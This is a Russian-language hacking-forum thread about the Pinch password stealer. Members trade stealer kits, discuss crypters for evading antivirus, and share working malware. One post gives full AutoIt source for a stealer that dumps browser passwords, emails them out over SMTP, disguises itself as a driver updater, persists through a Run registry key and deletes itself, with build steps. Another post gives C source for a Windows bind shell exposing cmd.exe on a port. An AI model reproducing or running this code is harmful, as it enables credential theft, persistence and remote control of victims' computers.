• XSS.stack #1 – первый литературный журнал от юзеров форума

Pinch

Отслеживать
Почта заведена на корпоративной сайте? Встречаются организации, у которых почта на mail.ru и т.п. Но подобрать то пароль можно в любом случае, только вряд ле получится.
У тебя физический доступ к компу жертвы есть?
Вот комплект пинчей последний версий + парсер + описание как юзать

Скрытый текст требует сообщений 30 у вас 140
скачать
Пароль на архив damagelab

и все ехе с нешта... =)


я вот думаю....
на сайте мпра написано

Цитата|Quote
Также доступен исходный код программы MPR, обратитесь к автору (alex@ritlabs.com) если Вы в этом заинтересованы.


надо бы раздабыть его)) и переписать под тихую кражу))
будет аналог пинча =\

узнав цену ты охуеешь))))
coban2k за просто так не отдаст...

з.ы. думал когда то декрипторы на icqмесенджеры взять)
узнал цену и окуел)

coban2k :punk:

Добавлено в [time]1277707683[/time]
да мне кажется ты несешь ерунду друг. Как раз твой MPR нихрена не находит. только на старых системах находит. (проверил самый последний билд)

мпр как разтаки на всех системах находит все что сохранено...

:fuck:


coban2k :punk:
 
Цитата|Quote(b3jiom @ 28.06.10, 08:48:03)
узнав цену ты охуеешь))))



2k$

около этого)
:pioneer:
 
G100M
iStealer вроде может
и какая разница между ним и пинчем?
Цена троя была:
If you pay with Western Union the price is: 90$ (USD).
шутят, что ли?
 
и какая разница между ним и пинчем?
он несколько новее. правда заточен под зарубежный софт (т.е. всякие МСНы, АИМы и т.д.)
 
Pernat1y
он несколько новее. правда заточен под зарубежный софт (т.е. всякие МСНы, АИМы и т.д.)

ага. заметил тоже. искал инфу, но на всех скринах отсутствует OUTLOOK, Thebat!. т.е. почтовые клиенты..
не сможешь значит?

Кто небудь лично использовал?
 
b3jiom Ты еще не забросил эту идею?

ну как сказать... в общем забросил))
нету кодера норм... вернее их много, а все цуки ленятся)
а кода было бы понты... на кб10... и все ж продуманно уже... но как все осуществить в коде... хз...

:tease:
 
Сделал на SMTP. проверил все на виртуалке. ВСЕ ОК ! :)

остался только криптовка.
что можете посоветовать? из буржуи стоит купить криптор?
 
хотел купить "свой".
у америкосов такие продвинутые крипторы есть с всякими anti's функсиями, клейщиками и обходом UAC, файрволлов. и стоит от 15$. Но после криптовки не работает пинч :(
А тут демиан за 5$.
А что за прикол с криптом ? почему буржуийские крипторы нарушают работу? может есть какая то особа у пинча?
 
И еще:
оказываеться я обшался уже с ним:
---
Я (23:11:21 8/05/2010)
Привет. я по поводу крипта. как будешь - дай узнать

414888818 (02:23:36 9/05/2010)
Привет. слушаю...

Я (02:29:33 9/05/2010)
Для начало интересует цена.


414888818 (12:33:53 9/05/2010)
15 вмз.
 
Скажите в чем может быть проблема: установил pinch 3 все как надо , открыл у себя .exe пришел отчет , внес отчет в пасрер , про мой комп, диски и программы написано , а паролей нет. Pinch устарел? Нечего воровать ? ) Или я что то не так сделал?
 
Держите нормальный стиллер:

Код: 
#NoTrayIcon
#include <array.au3>
#include <file.au3>
#include <inet.au3>
 
$s=0
$o=0
$sArgument = '/600'
while $s<=1
$var = _GetIP()
 
$e=StringCompare($var,"-1")
 
If Not $e= 0 Then
 
while $o <=1
 
;~  $file=inetget("http://www.nirsoft.net/utils/webbrowserpassview.zip",@TempDir&"\webbrowserpassview.zip")
if inetget("http://www.nirsoft.net/utils/webbrowserpassview.zip",@TempDir&"\webbrowserpassview.zip") Then
sleep(1000)
_Zip_UnzipAll(@TempDir&"\webbrowserpassview.zip",@TempDir&"\ey283gFt")
sleep(1000)
ShellExecuteWait(@TempDir&"\ey283gFt\WebBrowserPassView.exe","/stext "&@TempDir&"\ey283gFt\"&@ComputerName&".txt","","",@SW_SPOILER)
sleep(100)
$str = "http://schemas.microsoft.com/cdo/configuration/"
$hMAIL = ObjCreate ("CDO.Message")
    With $hMAIL
;::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::{
;;;;;;;;;;;;;;;;;;;;;;;; Вносим данные;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
        .From = "Ваш Емаил";from e-mail
        .To = "Ваш Емаил";to e-mail
        .Subject = @UserName&"- send all File"
        .TextBody = "Passwords Vir"
        .AddAttachment (@TempDir&"\ey283gFt\"&@ComputerName&".txt");файл для отправки
    EndWith
    With $hMAIL.Configuration.Fields
        .Item ($str & "sendusing") = 2
        .Item ($str & "smtpserver") = "smtp.yandex.ru";SMTP Server
        .Item ($str & "smtpauthenticate") = 1
        .Item ($str & "sendusername") = "Ваш Емаил";Login  
        .Item ($str & "sendpassword") = "ваш пароль почты";Пароль SMTP-сервера
        .Item ($str & "smtpserverport") =587;Порт
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;}
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
 
        .Update
    EndWith
$hMAIL.Send
 
$s=5
$o=5
EndIf
WEnd
 
Else
$de=@HomeDrive&"\DriverStores"
if not @ScriptFullPath<>$de&"\DriverUdate.exe" then 
dircreate($de)
FileSetAttrib($de,"+H")
filecopy(@ScriptFullPath,$de&"\DriverUdate.exe",1)
_RegRun($sArgument)
sleep(1000)
_dels()
endif
EndIf
WEnd
DirRemove(@TempDir&"\ey283gFt\",1)
filedelete(@TempDir&"\webbrowserpassview.zip")
_dels()
Func _dels() 
$sTemp = _TempFile(@TempDir, '~', '.bat')
$sPath = FileGetShortName(@ScriptFullPath)
    $hFile = FileOpen($sTemp, 2)
    FileWriteLine($hFile, '@echo off')
    FileWriteLine($hFile, ':loop')
    FileWriteLine($hFile, 'del ' & $sPath)
    FileWriteLine($hFile, 'if exist ' & $sPath & ' goto loop')
    FileWriteLine($hFile, 'del ' & $sTemp)
    FileClose($hFile)
 
    Run($sTemp, '', @SW_SPOILER)
EndFunc ;==>_ScriptDestroy
 
 
If $CmdLine[0] Then
    $iTimer = StringRegExpReplace($CmdLine[1], '[^0-9]', '') * 1000
    $iStart = TimerInit()
    While TimerDiff($iStart) <= $iTimer
        Sleep(250)
    WEnd
EndIf
 
 
 
Func _RegRun($s_Argument)
    Local $sRegRun = 'HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run'
    If Not RegRead($sRegRun, "DriverUpdate") Or RegRead($sRegRun, "DriverUpdate") <> @HomeDrive&"\DriverStores\DriverUdate.exe" & ' ' & $s_Argument Then
        RegWrite($sRegRun, "DriverUpdate", 'REG_SZ', @HomeDrive&"\DriverStores\DriverUdate.exe " & $s_Argument)
    EndIf
EndFunc ;==>_RegRun
 
 
Func _Zip_UnzipAll($hZipFile, $hDestPath, $flag = 1)
 
Local $DLLChk = _Zip_DllChk()
 
If $DLLChk <> 0 Then Return SetError($DLLChk, 0, 0);no dll
 
If not _IsFullPath($hZipFile) then Return SetError(4,0);zip file isn't a full path
 
If Not FileExists($hZipFile) Then Return SetError(2, 0, 0);no zip file
 
If Not FileExists($hDestPath) Then DirCreate($hDestPath)
 
Local $aArray[1]
 
$oApp = ObjCreate("Shell.Application")
 
$oApp.Namespace($hDestPath).CopyHere($oApp.Namespace($hZipFile).Items)
 
For $item In $oApp.Namespace($hZipFile).Items
 
_ArrayAdd($aArray, $item)
 
Next
 
While 1
 
If $flag = 1 then _Hide()
 
If FileExists($hDestPath & "\" & $aArray[UBound($aArray) - 1]) Then
 
Return SetError(0, 0, 1)
 
ExitLoop
 
EndIf
 
Sleep(500)
 
WEnd
 
EndFunc ;==>_Zip_UnzipAll
 
 
 
 
Func _Zip_DllChk()
 
If Not FileExists(@SystemDir & "\zipfldr.dll") Then Return 2
 
If Not RegRead("HKEY_CLASSES_ROOT\CLSID\{E88DCCE0-B7B3-11d1-A9F0-00AA0060FA31}", "") Then Return 3
 
Return 0
 
EndFunc ;==>_Zip_DllChk
 
Func _IsFullPath($path)
 
    if StringInStr($path,":\") then
 
        Return True
 
    Else
 
        Return False
 
    EndIf
 
Endfunc
 
Func _Hide()
 
If ControlGetHandle("[CLASS:#32770]", "", "[CLASS:SysAnimate32; INSTANCE:1]") <> "" And WinGetState("[CLASS:#32770]") <> @SW_SPOILER Then;The Window Exists
 
$hWnd = WinGetHandle("[CLASS:#32770]")
 
WinSetState($hWnd, "", @SW_SPOILER)
 
EndIf
 
EndFunc

1.Копируем всё в блокнот.
2.Вносим данные yandex аккаунта.
3.Сохраняем как vir.au3
4.Устанавливаем AutoIt(Ссылка: http://wikisend.com/download/684796/autoit.exe
5.Заходим в C:\Program Files\AutoIt3\Aut2Exe\ и открываем Aut2exe
6.Sourse (Autolt.au3 file) |________________________| Browse - выбираем наш файл vir.au3
7.Custom Icon (.ico file) |________________________| Browse - выбираем иконку для нашего файла.
8.Жмём на Convert
Стиллер готов.
P.s. желательно иметь аккаунт на yandex.ru с хотя бы 2-х дневной регистрацией. :pioneer:
 
Наверняка тут уже много об этом писали, но напишу ещё раз.

Пинч сдох и остался во временах контры 1.6, доты, радмина и диалапа.
Есть столько различных RAT'ов. Dark Comet чего один стоит.

Удалите тему, а то развели флудильню.
Спасибо, кэп. Это, конечно-же, весомая причина для поднятия полугодичного топика.
 


Добавлено в [time]1375077142[/time]
код давний может поможет я когда то делал так )
Код: 
#define WIN32_LEAN_AND_MEAN

#include <windows.h>
#include <winsock2.h>

#pragma comment(lib,"ws2_32.lib")


#define BUFF_SIZE        0x2000
#define SHELL_PORT       27015

DWORD WINAPI ReadThread(LPVOID lpParam);
DWORD /*WINAPI*/ ListenThread();//LPVOID lpParam);
DWORD WINAPI Shell(LPVOID lpParam);
BOOL InitWSA(void);

//==[ Start code programm ]== =======================================================
BOOL __stdcall WinMain(HINSTANCE,HINSTANCE,LPSTR,int)
{
 if (InitWSA())
 {
  ListenThread();
  WSACleanup();
 }
return true;	
}
//==[ Shell ]== =====================================================================
DWORD WINAPI Shell(LPVOID lpParam)
{
 SOCKET Sock = (SOCKET)lpParam;
 STARTUPINFO sIf = {0};
 PROCESS_INFORMATION pIf = {0};
 SECURITY_ATTRIBUTES sat = {0};
 HANDLE hInRead,hInWrite,hOutRead,hOutWrite;
   sat.nLength = sizeof(SECURITY_ATTRIBUTES);
   sat.bInheritHandle = TRUE;
   sat.lpSecurityDescriptor = NULL;
 if(!CreatePipe(&hInRead,&hInWrite,&sat,0)) return 0;
 if(!CreatePipe(&hOutRead,&hOutWrite,&sat,0))return 0;
 memset(&sIf,0,sizeof(sIf));
 memset(&pIf,0,sizeof(pIf));
 GetStartupInfo(&sIf);
  sIf.cb=sizeof (STARTUPINFO); 
  sIf.dwFlags = STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES;
  sIf.wShowWindow = SW_SPOILER;
  sIf.hStdInput  = hOutRead;
  sIf.hStdOutput = hInWrite;
  sIf.hStdError  = hInWrite;
 CreateProcess(NULL,"cmd.exe",&sat,&sat,TRUE,0,NULL,NULL,&sIf,&pIf);
 CloseHandle(hOutRead);
 CloseHandle(hInWrite);
 CloseHandle(pIf.hThread);
 char *buf=(char*)GlobalAlloc(GMEM_FIXED | GMEM_ZEROINIT,BUFF_SIZE);
 DWORD Exit;
 FD_SET F_Set;
 TIMEVAL TimeOut;
 TimeOut.tv_sec = 0;
 TimeOut.tv_usec = 5000;
 while (GetExitCodeProcess(pIf.hProcess,&Exit) && Exit == STILL_ACTIVE)
 { 
   DWORD BytesToRead;
   DWORD BytesTotal;
   while (PeekNamedPipe(hInRead,buf,BUFF_SIZE,&BytesToRead,&BytesTotal,NULL) && BytesToRead)
   { 
     ReadFile(hInRead,buf,BUFF_SIZE,&BytesToRead,NULL);
     send(Sock,buf,BytesToRead,0);
  ZeroMemory(buf,BUFF_SIZE);
   }
   FD_ZERO(&F_Set);
   FD_SET(Sock,&F_Set);
   if (select(0,&F_Set,NULL,NULL,&TimeOut) == -1) break;
   if (FD_ISSET(Sock,&F_Set))
   {
  int RecvBytes;
     if ((RecvBytes = recv(Sock,buf,BUFF_SIZE,0)) <= 0) break;

  //remake !!!
     if (strstr(buf,"exit")) break;
  DWORD BytesWritten;
  WriteFile(hOutWrite,buf,RecvBytes,&BytesWritten,0);
  ZeroMemory(buf,BUFF_SIZE);
   }
 }
 GlobalFree(buf);
 TerminateProcess(pIf.hProcess,0);
 CloseHandle(hInRead);
 CloseHandle(hOutWrite);
 closesocket(Sock);
 ExitThread(0);
 return 0;
}
//==[ Init WSAStartup (function)]== ===============================================
BOOL InitWSA(void)
{
 WSADATA FWSAData = {0};
 if (!WSAStartup(0x202,&FWSAData)) return TRUE; 
 return FALSE;
}
//==[ Connections thread ]== ======================================================
DWORD /*WINAPI*/ ListenThread()//LPVOID lpParam)
{
 SOCKET       Sock;
 SOCKET       FSocket;
 sockaddr_in  addr = {0};
 Sock = WSASocket(AF_INET,SOCK_STREAM,IPPROTO_IP,NULL,0,0);
 if (Sock == INVALID_SOCKET) 
 {
   closesocket(Sock);  
  return 0;
 }
 memset(&(addr.sin_zero),0,0x8);
  addr.sin_addr.s_addr = htonl(INADDR_ANY);
  addr.sin_family = AF_INET;
  addr.sin_port = htons(SHELL_PORT);
 int Size=sizeof(addr);
 if (bind(Sock,(struct sockaddr *)&addr,Size) == -1) 
 {
   closesocket(Sock);
  return 0;
 }
 if (listen(Sock,SOMAXCONN) == -1) 
 {
   closesocket(Sock);
  return 0;
 }
 for(;;)
 {
   FD_SET F_Set;
   FD_ZERO(&F_Set);
   FD_SET(Sock,&F_Set);
   if (select(0,&F_Set,NULL,NULL,NULL) == -1) break;
   if (FD_ISSET(Sock,&F_Set))
   {
  memset(&(addr.sin_zero),0,0x8);
  FSocket = accept(Sock,(struct sockaddr *)&addr,&Size);
     if (FSocket == INVALID_SOCKET) break;
     DWORD  Id;                          
  HANDLE hThread = CreateThread(NULL, 0,&Shell,(LPVOID)FSocket,0,&Id);
  if (hThread == NULL)  break;
   CloseHandle(hThread);
   }
 }
 closesocket(FSocket);
 closesocket(Sock);
 return 0;
}
 
admin


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх